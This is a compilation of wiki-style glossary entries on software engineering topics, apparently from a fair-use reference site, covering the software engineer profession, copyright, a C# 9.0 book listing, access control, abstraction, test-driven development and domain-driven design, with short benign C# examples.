Categories
DevOps Software Engineering

Software engineer

“A software engineer is a person who applies the principles of software engineering to the design, development, maintenance, testing, and evaluation of computer software.” (WP)

Occupation
Occupation type: Profession
Activity sectors: Information technology, Software industry
Description
Competencies: Requirements analysis, specification development, algorithm design, software quality assurance, documentation tasks
Education required: Varies from bachelor’s degree to advanced degree in software engineering or related field

Education

Half of all practitioners today have degrees in computer science, information systems, or information technology.[citation needed] A small, but growing, number of practitioners have software engineering degrees. In 1987, the Department of Computing at Imperial College London introduced the first three-year software engineering Bachelor’s degree in the UK and the world; in the following year, the University of Sheffield established a similar program.[1] In 1996, the Rochester Institute of Technology established the first software engineering bachelor’s degree program in the United States; however, it did not obtain ABET accreditation until 2003, the same time as Rice University, Clarkson University, Milwaukee School of Engineering, and Mississippi State University obtained theirs.[2] In 1997, PSG College of Technology in Coimbatore, India was the first to start a five-year integrated Master of Science degree in Software Engineering.[citation needed]

Since then, software engineering undergraduate degrees have been established at many universities. A standard international curriculum for undergraduate software engineering degrees, SE2004, was defined by a steering committee between 2001 and 2004 with funding from the Association for Computing Machinery and the IEEE Computer Society. As of 2004, in the U.S., about 50 universities offer software engineering degrees, which teach both computer science and engineering principles and practices. The first software engineering Master’s degree was established at Seattle University in 1979. Since then, graduate software engineering degrees have been made available from many more universities. Likewise in Canada, the Canadian Engineering Accreditation Board (CEAB) of the Canadian Council of Professional Engineers has recognized several software engineering programs.

In 1998, the US Naval Postgraduate School (NPS) established the first doctorate program in Software Engineering in the world.[citation needed] Additionally, many online advanced degrees in Software Engineering have appeared such as the Master of Science in Software Engineering (MSE) degree offered through the Computer Science and Engineering Department at California State University, Fullerton. Steve McConnell opines that because most universities teach computer science rather than software engineering, there is a shortage of true software engineers.[3] ETS (École de technologie supérieure) University and UQAM (Université du Québec à Montréal) were mandated by IEEE to develop the Software Engineering Body of Knowledge (SWEBOK), which has become an ISO standard describing the body of knowledge covered by a software engineer.[4]

Other degrees

In business, some software engineering practitioners have CS or Software Engineering degrees. In embedded systems, some have electrical engineering, electronics engineering, computer science with an emphasis in “embedded systems”, or computer engineering degrees, because embedded software often requires a detailed understanding of hardware. In medical software, practitioners may have medical informatics, general medical, or biology degrees.[citation needed]

Some practitioners have mathematics, science, engineering, or technology (STEM) degrees. Some have philosophy (logic in particular) or other non-technical degrees.[citation needed] For instance, Barry Boehm earned degrees in mathematics. Others have no degrees at all.[citation needed]

Profession

Employment

See also: Software engineering demographics

Most software engineers work as employees or contractors. Software engineers work with businesses, government agencies (civilian or military), and non-profit organizations. Some software engineers work on their own as consulting software engineers. Some organizations have specialists to perform all of the tasks in the software development process. Other organizations separate software engineers based on specific software-engineering tasks. These companies sometimes hire interns (possibly university or college students) for a short period of time. In large projects, software engineers are distinguished from people who specialize in only one role because they take part in the design as well as the programming of the project. In small projects, software engineers will usually fill several or all roles at the same time. Specializations include:

Impact of globalization

Most students in the developed world have avoided degrees related to software engineering because of the fear of offshore outsourcing (importing software products or services from other countries) and of being displaced by foreign visa workers.[5] Although government statistics do not currently show a threat to software engineering itself, a related career, computer programming, does appear to have been affected.[6][7] Often one is expected to start out as a computer programmer before being promoted to software engineer. Thus, the career path to software engineering may be rough, especially during recessions.

Some career counselors suggest a student also focus on “people skills” and business skills rather than purely technical skills, because such “soft skills” are allegedly more difficult to offshore. Most employers also expect a reasonable command of written and spoken English.[8] The quasi-management aspects of software engineering appear to be what has kept it from being affected by globalization.[9]

Prizes

There are several prizes in the field of software engineering:[10]

  • The Codie Awards are yearly awards issued by the Software and Information Industry Association for excellence in software development within the software industry.
  • The Jolt Awards are awards in the software industry.
  • The Stevens Award is a software engineering award given in memory of Wayne Stevens.

Use of the title “Engineer”

Main articles: Software engineering professionalism and Regulation and licensure in engineering

Origin of the term

Margaret Hamilton promoted the term “software engineering” during her work on the Apollo program. The term “engineering” was used to acknowledge that the work should be taken just as seriously as other contributions toward the advancement of technology. Hamilton details her use of the term:

When I first came up with the term, no one had heard of it before, at least in our world. It was an ongoing joke for a long time. They liked to kid me about my radical ideas. It was a memorable day when one of the most respected hardware gurus explained to everyone in a meeting that he agreed with me that the process of building software should also be considered an engineering discipline, just like with hardware. Not because of his acceptance of the new “term” per se, but because we had earned his and the acceptance of the others in the room as being in an engineering field in its own right.[11]

Suitability of the term

In each of the last few decades, at least one radical new approach has entered the mainstream of software development (e.g. Structured Programming, Object Orientation), implying that the field is still changing too rapidly to be considered an engineering discipline. Proponents argue that the supposedly radical new approaches are evolutionary rather than revolutionary.[citation needed]

Individual commentators have disagreed sharply on how to define software engineering or its legitimacy as an engineering discipline. David Parnas has said that software engineering is, in fact, a form of engineering.[12][13] Steve McConnell has said that it is not, but that it should be.[14] Donald Knuth has said that programming is an art and a science.[15] Edsger W. Dijkstra claimed that the terms software engineering and software engineer have been misused[improper synthesis?] and should be considered harmful, particularly in the United States.[16]

Regulatory classification

Canada

In Canada, the use of the job title Engineer is controlled in each province by self-regulating professional engineering organizations, which are also tasked with enforcement of the governing legislation. The intent is that any individual holding themselves out as an engineer has been verified to have been educated to a certain accredited level and that their professional practice is subject to a code of ethics and peer scrutiny. It is also illegal to use the title Engineer in Canada unless an individual is licensed.

In Ontario, the Professional Engineers Act[17] stipulates a minimum education level of a three-year diploma in technology from a College of Applied Arts and Technology or a degree in a relevant science area.[18] However, engineering undergraduates and all other applicants are not allowed to use the title of engineer until they complete the minimum amount of work experience of four years in addition to completing the Professional Practice Examination (PPE). If the applicant does not hold an undergraduate engineering degree then they may have to take the Confirmatory Practice Exam or Specific Examination Program unless the exam requirements are waived by a committee.[19][20]

IT professionals with degrees in other fields (such as computer science or information systems) are restricted from using the title Software Engineer, or wording Software Engineer in a title, depending on their province or territory of residence.[citation needed]

In some instances, cases have been taken to court regarding the illegal use of the protected title Engineer.[21]

Europe

Throughout the whole of Europe, suitably qualified engineers may obtain the professional European Engineer qualification.

France

In France, the term ingénieur (engineer) is not a protected title and can be used by anyone, even by those who do not possess an academic degree.

However, the title Ingénieur Diplômé (Graduate Engineer) is an official academic title that is protected by the government and is associated with the Diplôme d’Ingénieur, which is one of the most prestigious academic degrees in France.

Iceland

The use of the title tölvunarfræðingur (computer scientist) is protected by law in Iceland.[22] Software engineering is taught in Computer Science departments at Icelandic universities. Icelandic law states that, when the degree was awarded abroad, permission must be obtained from the Minister of Industry before the title may be used. The title is awarded to those who have obtained a BSc degree in Computer Science from a recognized higher educational institution.[23]

New Zealand

In New Zealand, the Institution of Professional Engineers New Zealand (IPENZ), which licenses and regulates the country’s chartered engineers (CPEng), recognizes software engineering as a legitimate branch of professional engineering and accepts applications from software engineers to obtain chartered status, provided they have a tertiary degree in approved subjects. Software Engineering is included, whereas Computer Science normally is not.[24]

United States

The Bureau of Labor Statistics (BLS) classifies computer software engineers as a subcategory of “computer specialists”, along with occupations such as computer scientist, programmer, database administrator, and network administrator.[25] The BLS classifies all other engineering disciplines, including computer hardware engineers, as engineers.[26]

Many states prohibit unlicensed persons from calling themselves an Engineer, or from indicating branches or specialties not covered by licensing acts.[27][28][29][30][31][32][33][34][35][36] In many states, the title Engineer is reserved for individuals with a Professional Engineering license, indicating that they have shown a minimum level of competency through accredited engineering education, qualified engineering experience, and the engineering board’s examinations.[37][38][29][30][31][32][33][34][35][36]

In April 2013 the National Council of Examiners for Engineering and Surveying (NCEES) began offering a Professional Engineer (PE) exam for Software Engineering. The exam was developed in association with the IEEE Computer Society.[39] NCEES ended the exam in April 2019 due to lack of participation.[40]

References

  1. ^ Cowling, A. J. 1999. The first decade of an undergraduate degree program in software engineering. Ann. Softw. Eng. 6, 1–4 (Apr. 1999), 61–90.
  2. ^ “ABET Accredited Engineering Programs”. April 3, 2007. Retrieved April 3, 2007.
  3. ^ McConnell, Steve (July 10, 2003). Professional Software Development: Shorter Schedules, Higher Quality Products, More Successful Projects, Enhanced Careers. ISBN 978-0-321-19367-4.
  4. ^ Software Engineering — Guide to the software engineering body of knowledge (SWEBOK), International Organization for Standardization, 2015, retrieved January 11, 2020
  5. ^ “IT news, careers, business technology, reviews”. Computerworld.
  6. ^ “Computer Programmers”.
  7. ^ “Software developer growth slows in North America | InfoWorld | News | 2007-03-13 | By Robert Mullins, IDG News Service”. Archived from the original on April 4, 2009.
  8. ^ “Hot Skills, Cold Skills”. Archived from the original on February 22, 2014.
  9. ^ Dual Roles: The Changing Face of IT
  10. ^ Some external links:
  11. ^ Lawrence, Snyder (2017). Fluency with Information Technology: Skills, Concepts, & Capabilities (7th ed.). NY, NY. ISBN 978-0134448725. OCLC 960641978.
  12. ^ Parnas, David L. (1998). “Software Engineering Programmes are not Computer Science Programmes”. Annals of Software Engineering. 6: 19–37. doi:10.1023/A:1018949113292. S2CID 35786237., p. 19: “Rather than treat software engineering as a subfield of computer science, I treat it as an element of the set, {Civil Engineering, Mechanical Engineering, Chemical Engineering, Electrical Engineering,….}.”
  13. ^ Parnas, David L. (1998). “Software Engineering Programmes are not Computer Science Programmes”. Annals of Software Engineering. 6: 19–37. doi:10.1023/A:1018949113292. S2CID 35786237., p. 20: “This paper argues that the introduction of accredited professional programs in software engineering, programmes that are modelled on programmes in traditional engineering disciplines will help to increase both the quality and quantity of graduates who are well prepared, by their education, to develop trustworthy software products.”
  14. ^ McConnell, Steve (August 2003). Professional Software Development: Shorter Schedules, Better Projects, Superior Products, Enhanced Careers. Boston, MA: Addison-Wesley. ISBN 0-321-19367-9., p. 39: “In my opinion, the answer to that question is clear: Professional software development should be engineering. Is it? No. But should it be? Unquestionably, yes. “
  15. ^ Knuth, Donald (1974). “Computer Programming as an Art” (PDF). Communications of the ACM. 17 (12): 667–673. doi:10.1145/361604.361612. S2CID 207685720. Transcript of the 1974 Turing Award lecture.
  16. ^ Dijkstra, Edsger W; transcribed by Mario Béland (November 23, 2004) [First published December 3, 1993]. “There is still a war going on (manuscript Austin, 3 December 1993)”. E. W. Dijkstra Archive. The University of Texas at Austin, Department of Computer Sciences. Retrieved February 17, 2007. When the term was coined in 1968 by F.L. Bauer of the Technological University of Munich, I welcomed it. [. . .] I interpreted the introduction of the term “software engineering” as an apt reflection of the fact that the design of software systems was an activity par excellence for the mathematical engineer. [. . .]. As soon the term arrived in the USA, it was relieved of all its technical content. It had to be so for in its original meaning it was totally unacceptable [. . .] In the meantime, software engineering has become an almost empty term, as was nicely demonstrated by Data General who overnight promoted all its programmers to the exalted rank of “software engineer”!
  17. ^ “Professional Engineers Act”. July 24, 2014.
  18. ^ “Academic Requirements”. www.peo.on.ca.
  19. ^ “Confirmatory Exam Program”. www.peo.on.ca.
  20. ^ “mybtechdegree.ca”. mybtechdegree.ca.
  21. ^ ‘Professional Engineers of Ontario’ – “Quebec Engineers win court battle against Microsoft”
  22. ^ “Lög um löggildingu nokkurra starfsheita sérfræðinga í tækni- og hönnunargreinum” (in Icelandic). Parliament of Iceland – Althing. March 11, 1996. Retrieved August 25, 2014.
  23. ^ “Lög um breytingu á lögum nr. 8/1996, um löggildingu nokkurra starfsheita sérfræðinga í tækni- og hönnunargreinum, með síðari breytingum”. Alþingi. Retrieved October 3, 2016.
  24. ^ “Good Practice Guidelines for Software Engineering in New Zealand” (PDF). IPENZ.
  25. ^ U.S. Department of Labor and Statistics. The 2000 Standard Occupational Classification (SOC) System: 15-0000 Computer and Mathematical Occupations
  26. ^ U.S. Department of Labor and Statistics. The 2000 Standard Occupational Classification (SOC) System: 17-0000 Architecture and Engineering Occupations
  27. ^ Florida Board of Professional Engineering. “The 2019 Florida Statutes”.
  28. ^ PROFESSIONAL ENGINEERS AND LAND SURVEYORS. “O.C.G.A. § 43-15-1” (PDF).
  29. ^ NJ Engineering Board. “NEW JERSEY ADMINISTRATIVE CODE TITLE 13 LAW AND PUBLIC SAFETY CHAPTER 4 0” (PDF).
  30. ^ SC Engineering Law. “Code of Laws – Title 40 – Chapter 22 – Engineers and Surveyors”.
  31. ^ AL Engineering Law. “Alabama Law Regulating Practice of Engineering and Land Surveying” (PDF).
  32. ^ WV Engineering Law. “West Virginia Engineering Law Statutes and Rules” (PDF).
  33. ^ OK Engineering Law. “Oklahoma Statutes, Rules and Ethics for Professional Engineers” (PDF).
  34. ^ NV Engineering Law. “NRS: Chapter 625 – Professional Engineers and Land Surveyors”. Unlawful practice of engineering.
  35. ^ MS Engineering Law. “Part 901: Rules and Regulations of the Mississippi Board of Licensure for Professional Engineers and Surveyors” (PDF).
  36. ^ IL Engineering Law. “225 ILCS 325/ Professional Engineering Practice Act of 1989”.
  37. ^ Florida Board of Professional Engineering. “Chapter 471” (PDF).
  38. ^ GEORGIA BOARD OF PROFESSIONAL ENGINEERS AND LAND SURVEYORS. “O.C.G.A. § 43-15-1” (PDF).
  39. ^ “New Software Engineering Exam Approved for Licensure”. IEEE Computer Society. May 4, 2012. Retrieved August 6, 2018.
  40. ^ “NCEES discontinuing PE Software Engineering exam”. National Council of Examiners for Engineering and Surveying. March 13, 2018. Retrieved August 6, 2018.

Categories

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Software

“Software is a collection of instructions and data that tell the computer how to work. This is in contrast to physical hardware, from which the system is built and actually performs the work. In computer science and software engineering, computer software is all information processed by computer systems, including programs and data. Computer software includes computer programs, libraries, and related non-executable data, such as online documentation or digital media. Computer hardware and software require each other and neither can be realistically used on its own.” (WP)

“At the lowest programming level, executable code consists of machine language instructions supported by an individual processor—typically a central processing unit (CPU) or a graphics processing unit (GPU). A machine language consists of groups of binary values signifying processor instructions that change the state of the computer from its preceding state. For example, an instruction may change the value stored in a particular storage location in the computer—an effect that is not directly observable to the user. An instruction may also invoke one of many input or output operations, for example displaying some text on a computer screen; causing state changes which should be visible to the user. The processor executes the instructions in the order they are provided, unless it is instructed to “jump” to a different instruction, or is interrupted by the operating system. As of 2015, most personal computers, smartphone devices, and servers have processors with multiple execution units or multiple processors performing computation together, and computing has become a much more concurrent activity than in the past.” (WP)

“The majority of software is written in high-level programming languages. They are easier and more efficient for programmers because they are closer to natural languages than machine languages.[1] High-level languages are translated into machine language using a compiler or an interpreter or a combination of the two. Software may also be written in a low-level assembly language, which has strong correspondence to the computer’s machine language instructions and is translated into machine language using an assembler.” (WP)
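
As a rough illustration of that translation, the sketch below shows two C# statements and, in comments, the kind of .NET intermediate-language (IL) instructions a compiler might emit for them; the runtime's JIT compiler then turns the IL into the processor's own machine language. The exact instructions vary by compiler and settings, so treat this as an assumption-laden sketch rather than the output of any particular toolchain.

```csharp
// Two high-level statements:
int x = 41;
x = x + 1;                       // the statement traced in the comments below
System.Console.WriteLine(x);     // prints 42

// A compiler translates the increment into a short sequence of lower-level
// instructions. Conceptually, the .NET IL for "x = x + 1" looks like:
//
//   ldloc.0      // push the current value of local variable x onto the stack
//   ldc.i4.1     // push the integer constant 1
//   add          // pop both values, push their sum
//   stloc.0      // pop the sum and store it back into x
//
// The runtime's JIT compiler then converts these IL instructions into the
// processor's native machine instructions.
```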

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Copyright

Copyright is a type of intellectual property that gives its owner the exclusive right to make copies of a creative work, usually for a limited time.[1][2][3][4][5] The creative work may be in a literary, artistic, educational, or musical form. Copyright is intended to protect the original expression of an idea in the form of a creative work, but not the idea itself.[6][7][8] A copyright is subject to limitations based on public interest considerations, such as the fair use doctrine in the United States.” (WP)

“Some jurisdictions require “fixing” copyrighted works in a tangible form. It is often shared among multiple authors, each of whom holds a set of rights to use or license the work, and who are commonly referred to as rights holders.[9][10][11][12][better source needed] These rights frequently include reproduction, control over derivative works, distribution, public performance, and moral rights such as attribution.[13]” (WP)

“Copyrights can be granted by public law and are in that case considered “territorial rights”. This means that copyrights granted by the law of a certain state do not extend beyond the territory of that specific jurisdiction. Copyrights of this type vary by country; many countries, and sometimes a large group of countries, have made agreements with other countries on procedures applicable when works “cross” national borders or national rights are inconsistent.[14]” (WP)

“Typically, the public law duration of a copyright expires 50 to 100 years after the creator dies, depending on the jurisdiction. Some countries require certain copyright formalities[5] to establish copyright, while others recognize copyright in any completed work without a formal registration. In general, many believe that a long copyright duration guarantees better protection of works.” (WP)

Sources:

Fair Use Sources:

Categories
C# .NET Software Engineering

C# 9.0 Pocket Reference: Instant Help for C# 9.0 Programmers, 1st Edition

See also: C# and .NET Framework, C# Bibliography and C# 9.0 in a Nutshell

C# 9.0 Pocket Reference: Instant Help for C# 9.0 Programmers 1st Edition, by Joseph Albahari and Ben Albahari, 2021, B08SYWWDTX (CS9PR)

Fair Use Source: B08SYWWDTX (CS9PR)

When you have questions about C# 9.0 or .NET 5, this best-selling guide has the answers you need. C# is a language of unusual flexibility and breadth, but with its continual growth there’s so much more to learn. In the tradition of O’Reilly’s Nutshell guides, this thoroughly updated edition is simply the best one-volume reference to the C# language available today.

Organized around concepts and use cases, C# 9.0 in a Nutshell provides intermediate and advanced programmers with a concise map of C# and .NET that also plumbs significant depths.

  • Get up to speed on C#, from syntax and variables to advanced topics such as pointers, records, closures, and patterns
  • Dig deep into LINQ with three chapters dedicated to the topic
  • Explore concurrency and asynchrony, advanced threading, and parallel programming
  • Work with .NET features, including regular expressions, networking, spans, reflection, and cryptography

Joseph Albahari is author of C# 8.0 in a Nutshell, C# 8.0 Pocket Reference, and LINQ Pocket Reference (all from O’Reilly). He also wrote LINQPad, the popular code scratchpad and LINQ querying utility.

Book Details

  • ASIN: B08SYWWDTX
  • Publisher: O’Reilly Media; 1st edition (January 13, 2021)
  • Publication date: January 13, 2021
  • Print length: 362 pages

Table of Contents:

A First C# Program Compilation

Syntax Identifiers and Keywords

Literals, Punctuators, and Operators

Comments

Type Basics Predefined Type Examples

Custom Type Examples

Types and Conversions

Value Types Versus Reference Types

Predefined Type Taxonomy

Numeric Types Numeric Literals

Numeric Conversions

Arithmetic Operators

Increment and Decrement Operators

Specialized Integral Operations

8- and 16-Bit Integral Types

Special Float and Double Values

double Versus decimal

Real Number Rounding Errors

Boolean Type and Operators Equality and Comparison Operators

Conditional Operators

Strings and Characters String Type

Arrays Default Element Initialization

Indices and Ranges

Multidimensional Arrays

Simplified Array Initialization Expressions

Variables and Parameters The Stack and the Heap

Definite Assignment

Default Values

Parameters

var — Implicitly Typed Local Variables

Target-Typed new Expressions (C# 9)

Expressions and Operators Assignment Expressions

Operator Precedence and Associativity

Operator Table

Null Operators Null-Coalescing Operator

Null-Coalescing Assignment Operator

Null-Conditional Operator

Statements Declaration Statements

Expression Statements

Selection Statements

Iteration Statements

Jump Statements

Namespaces The using Directive

using static

Rules Within a Namespace

Aliasing Types and Namespaces

Classes Fields

Constants

Methods

Instance Constructors

Deconstructors

Object Initializers

The this Reference

Properties

Indexers

Static Constructors

Static Classes

Finalizers

Partial Types and Methods

The nameof Operator

Inheritance Polymorphism

Casting and Reference Conversions

Virtual Function Members

Abstract Classes and Abstract Members

Hiding Inherited Members

Sealing Functions and Classes

The base Keyword

Constructors and Inheritance

Overloading and Resolution

The object Type Boxing and Unboxing

Static and Runtime Type Checking

The GetType Method and typeof Operator

Object Member Listing

Equals, ReferenceEquals, and GetHashCode

The ToString Method

Structs Struct Construction Semantics

readonly Structs and Functions

Access Modifiers Friend Assemblies

Accessibility Capping

Interfaces Extending an Interface

Explicit Interface Implementation

Implementing Interface Members Virtually

Reimplementing an Interface in a Subclass

Default Interface Members

Enums Enum Conversions

Flags Enums

Enum Operators

Nested Types

Generics Generic Types

Generic Methods

Declaring Type Parameters

typeof and Unbound Generic Types

The default Generic Value

Generic Constraints

Subclassing Generic Types

Self-Referencing Generic Declarations

Static Data

Covariance

Contravariance

Delegates Writing Plug-In Methods with Delegates

Instance and Static Method Targets

Multicast Delegates

Generic Delegate Types

The Func and Action Delegates

Delegate Compatibility

Events Standard Event Pattern

Event Accessors

Lambda Expressions Capturing Outer Variables

Lambda Expressions Versus Local Methods

Anonymous Methods

try Statements and Exceptions The catch Clause

The finally Block

Throwing Exceptions

Key Properties of System.Exception

Enumeration and Iterators Enumeration

Collection Initializers

Iterators

Iterator Semantics

Composing Sequences

Nullable Value Types Nullable Struct

Nullable Conversions

Boxing/Unboxing Nullable Values

Operator Lifting

bool? with & and | Operators

Nullable Types and Null Operators

Nullable Reference Types

Extension Methods Extension Method Chaining

Ambiguity and Resolution

Anonymous Types

Tuples Naming Tuple Elements

Deconstructing Tuples

Records (C# 9) Defining a Record

Nondestructive Mutation

Primary Constructors

Records and Equality Comparison

Patterns var Pattern

Constant Pattern

Relational Patterns (C# 9)

Pattern Combinators (C# 9)

Tuple and Positional Patterns

Property Patterns

LINQ LINQ Fundamentals

Deferred Execution

Standard Query Operators

Chaining Query Operators

Query Expressions

The let Keyword

Query Continuations

Multiple Generators

Joining

Ordering

Grouping

OfType and Cast

Dynamic Binding Static Binding Versus Dynamic Binding

Custom Binding

Language Binding

RuntimeBinderException

Runtime Representation of dynamic

Dynamic Conversions

var Versus dynamic

Dynamic Expressions

Dynamic Member Overload Resolution

Uncallable Functions

Operator Overloading Operator Functions

Overloading Equality and Comparison Operators

Custom Implicit and Explicit Conversions

Attributes Attribute Classes

Named and Positional Attribute Parameters

Attribute Targets

Specifying Multiple Attributes

Writing Custom Attributes

Retrieving Attributes at Runtime

Caller Info Attributes

Asynchronous Functions The await and async Keywords

Capturing Local State

Writing Asynchronous Functions

Parallelism

Asynchronous Lambda Expressions

Asynchronous Streams

Unsafe Code and Pointers Pointer Basics

Unsafe Code

The fixed Statement

The Pointer-to-Member Operator

The stackalloc Keyword

Fixed-Size Buffers

void*

Function Pointers (C# 9)

Preprocessor Directives Pragma Warning

XML Documentation Standard XML Documentation Tags

Index

Sources:

Fair Use Source: B08SYWWDTX (CS9PR)

Categories
Cloud DevSecOps-Security-Privacy Operating Systems Software Engineering

Access Control

“access control – A *trusted process that limits access to the resources and objects of a computer system in accordance with a *security model. The process can be implemented by reference to a stored table that lists the *access rights of subjects to objects, e.g. users to records. Optionally the process may record in an *audit trail any illegal access attempts.” (ODCS)
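
As a rough illustration of the stored-table approach described in the definition above, here is a minimal sketch in C#. The Permission values, the subject and object names, and the in-memory dictionary standing in for the stored table are all assumptions made for this example; a real system would back this with a policy store and a durable audit log.

```csharp
using System;
using System.Collections.Generic;

// Minimal, illustrative table-based access control (names are hypothetical).
public enum Permission { Read, Write }

public class AccessControlTable
{
    // Maps (subject, object) pairs to the permissions the subject holds on that object.
    private readonly Dictionary<(string Subject, string Obj), HashSet<Permission>> _rights = new();
    private readonly List<string> _auditTrail = new();

    public void Grant(string subject, string obj, Permission permission)
    {
        if (!_rights.TryGetValue((subject, obj), out var perms))
            _rights[(subject, obj)] = perms = new HashSet<Permission>();
        perms.Add(permission);
    }

    // Returns true if access is allowed; records denied attempts in an audit trail.
    public bool CheckAccess(string subject, string obj, Permission permission)
    {
        bool allowed = _rights.TryGetValue((subject, obj), out var perms)
                       && perms.Contains(permission);
        if (!allowed)
            _auditTrail.Add($"DENIED: {subject} attempted {permission} on {obj} at {DateTime.UtcNow:o}");
        return allowed;
    }

    public IReadOnlyList<string> AuditTrail => _auditTrail;
}
```

A caller would grant rights up front and route every resource access through CheckAccess, so that refused attempts end up in the audit trail, mirroring the "illegal access attempts" mentioned in the definition.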

Fair Use Source: B019GXM8X8 (ODCS)

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Abstraction

“abstraction – The principle of ignoring those aspects of a subject that are not relevant to the current purpose in order to concentrate solely on those that are. The application of this principle is essential in the development and understanding of all forms of computer system. See data abstraction, procedural abstraction.” (ODCS)
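
As a small illustration of data abstraction in code (the IStack interface and ListStack class are invented for this sketch, not taken from the source), callers depend only on the operations that matter for their purpose and ignore how the values are actually stored:

```csharp
using System.Collections.Generic;

// The abstraction: callers care only that they can push and pop items.
public interface IStack<T>
{
    void Push(T item);
    T Pop();
}

// One concrete implementation; the backing List<T> is a detail hidden from callers.
public class ListStack<T> : IStack<T>
{
    private readonly List<T> _items = new();

    public void Push(T item) => _items.Add(item);

    public T Pop()
    {
        var last = _items[^1];               // ^1 = last element (index-from-end)
        _items.RemoveAt(_items.Count - 1);
        return last;
    }
}
```

Swapping ListStack for an array-backed or linked-list implementation would not affect any code written against IStack&lt;T&gt;, which is exactly the detail-hiding the definition describes.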

Fair Use Source: B019GXM8X8 (ODCS)

Sources:

Fair Use Sources:

Categories
Cloud DevOps Software Engineering

TDD Test-Driven Development

Return to Timeline of the History of Computers, Networking

Test-driven development (TDD) is a software development process relying on software requirements being converted to test cases before software is fully developed, and tracking all software development by repeatedly testing the software against all test cases. This is opposed to software being developed first and test cases created later.

American software engineer Kent Beck, who is credited with having developed or “rediscovered”[1] the technique, stated in 2003 that TDD encourages simple designs and inspires confidence.[2]

Test-driven development is related to the test-first programming concepts of extreme programming, begun in 1999,[3] but more recently has created more general interest in its own right.[4]

Programmers also apply the concept to improving and debugging legacy code developed with older techniques.[5]

Test-driven development cycle

The following sequence is based on the book Test-Driven Development by Example:[2]

[Figure: A graphical representation of the test-driven development lifecycle]

  1. Add a test: In test-driven development, each new feature begins with writing a test. Write a test that defines a function or improvements of a function, which should be very succinct. To write a test, the developer must clearly understand the feature’s specification and requirements. The developer can accomplish this through use cases and user stories to cover the requirements and exception conditions, and can write the test in whatever testing framework is appropriate to the software environment. It could be a modified version of an existing test. This is a differentiating feature of test-driven development versus writing unit tests after the code is written: it makes the developer focus on the requirements before writing the code, a subtle but important difference.
  2. Run all tests and see if the new test fails: This validates that the test harness is working correctly, shows that the new test does not pass without requiring new code because the required behavior already exists, and rules out the possibility that the new test is flawed and will always pass. The new test should fail for the expected reason. This step increases the developer’s confidence in the new test.
  3. Write the code: The next step is to write some code that causes the test to pass. The new code written at this stage is not perfect and may, for example, pass the test in an inelegant way. That is acceptable because it will be improved and honed in Step 5. At this point, the only purpose of the written code is to pass the test. The programmer must not write code that is beyond the functionality that the test checks.
  4. Run tests: If all test cases now pass, the programmer can be confident that the new code meets the test requirements and does not break or degrade any existing features. If they do not, the new code must be adjusted until they do.
  5. Refactor code: The growing code base must be cleaned up regularly during test-driven development. New code can be moved from where it was convenient for passing a test to where it more logically belongs. Duplication must be removed. Object, class, module, variable, and method names should clearly represent their current purpose and use, as extra functionality is added. As features are added, method bodies can get longer and other objects larger. They benefit from being split and their parts carefully named to improve readability and maintainability, which will be increasingly valuable later in the software lifecycle. Inheritance hierarchies may be rearranged to be more logical and helpful, and perhaps to benefit from recognized design patterns. There are specific and general guidelines for refactoring and for creating clean code.[6][7] By continually re-running the test cases throughout each refactoring phase, the developer can be confident that the process is not altering any existing functionality. The concept of removing duplication is an important aspect of any software design. In this case, however, it also applies to the removal of any duplication between the test code and the production code—for example magic numbers or strings repeated in both to make the test pass in Step 3.
  6. Repeat: Starting with another new test, the cycle is then repeated to push forward the functionality. The size of the steps should always be small, with as few as 1 to 10 edits between each test run. If new code does not rapidly satisfy a new test, or other tests fail unexpectedly, the programmer should undo or revert in preference to excessive debugging. Continuous integration helps by providing revertible checkpoints. A minimal code sketch of one pass through this cycle appears below.
When using external libraries, it is important not to make increments that are so small as to be effectively merely testing the library itself,[4] unless there is some reason to believe that the library itself may be buggy or incomplete.
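
Below is a minimal sketch of one red-green-refactor pass. It assumes the xUnit test framework and a hypothetical ShoppingCart feature; neither the framework choice nor the feature comes from the text above.

```csharp
using System.Collections.Generic;
using System.Linq;
using Xunit;

// Step 1: write the test first. It fails until ShoppingCart.Total exists and is correct.
public class ShoppingCartTests
{
    [Fact]
    public void Total_SumsThePricesOfAllAddedItems()
    {
        var cart = new ShoppingCart();
        cart.Add("book", 12.50m);
        cart.Add("pen", 2.00m);

        Assert.Equal(14.50m, cart.Total);
    }
}

// Step 3: write just enough production code to make the test pass.
// Step 5 (refactor) might later extract an Item type or remove duplication,
// re-running the test after every change.
public class ShoppingCart
{
    private readonly List<(string Name, decimal Price)> _items = new();

    public void Add(string name, decimal price) => _items.Add((name, price));

    public decimal Total => _items.Sum(i => i.Price);
}
```

The test is written first and fails (step 2), the ShoppingCart code is added to make it pass (steps 3 and 4), and both can then be refactored while the test keeps guarding the behavior (step 5).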

Fair Use Sources:

Categories
Cloud DevOps Software Engineering

DDD Domain-Driven Design

Return to Timeline of the History of Computers, Networking

Domain-driven design (DDD) is the concept that the structure and language of software code (class names, class methods, class variables) should match the business domain. For example, if a software system processes loan applications, it might have classes such as LoanApplication and Customer, and methods such as AcceptOffer and Withdraw.
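
A minimal sketch of what that alignment between code and business language might look like; only the class and method names come from the example above, and the member details are illustrative assumptions:

```csharp
// Domain classes named after the business domain's own vocabulary.
public class Customer
{
    public string Name { get; }
    public Customer(string name) => Name = name;
}

public class LoanApplication
{
    public Customer Applicant { get; }
    public decimal Amount { get; }
    public bool OfferAccepted { get; private set; }
    public bool Withdrawn { get; private set; }

    public LoanApplication(Customer applicant, decimal amount)
    {
        Applicant = applicant;
        Amount = amount;
    }

    // Method names mirror the language domain experts use.
    public void AcceptOffer() => OfferAccepted = true;

    public void Withdraw() => Withdrawn = true;
}
```

The point is only that the names in the code mirror the business vocabulary; the members a real system needs would come from the domain experts.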

DDD connects the implementation to an evolving model.[1]

Domain-driven design is predicated on the following goals:

  • placing the project’s primary focus on the core domain and domain logic;
  • basing complex designs on a model of the domain;
  • initiating a creative collaboration between technical and domain experts to iteratively refine a conceptual model that addresses particular domain problems.

The term was coined by Eric Evans in his book of the same title.[2]

Concepts

Concepts of the model include:

  • Context: The setting in which a word or statement appears that determines its meaning.
  • Domain: A sphere of knowledge (ontology), influence, or activity. The subject area to which the user applies a program is the domain of the software.
  • Model: A system of abstractions that describes selected aspects of a domain and can be used to solve problems related to that domain.
  • Ubiquitous Language: A language structured around the domain model and used by all team members to connect all the activities of the team with the software.

Strategic domain-driven design

[Figure: Semantic network of patterns in strategic domain-driven design]

Ideally, it would be preferable to have a single, unified model. While this is a noble goal, in reality it typically fragments into multiple models. It is useful to recognize this fact of life and work with it.
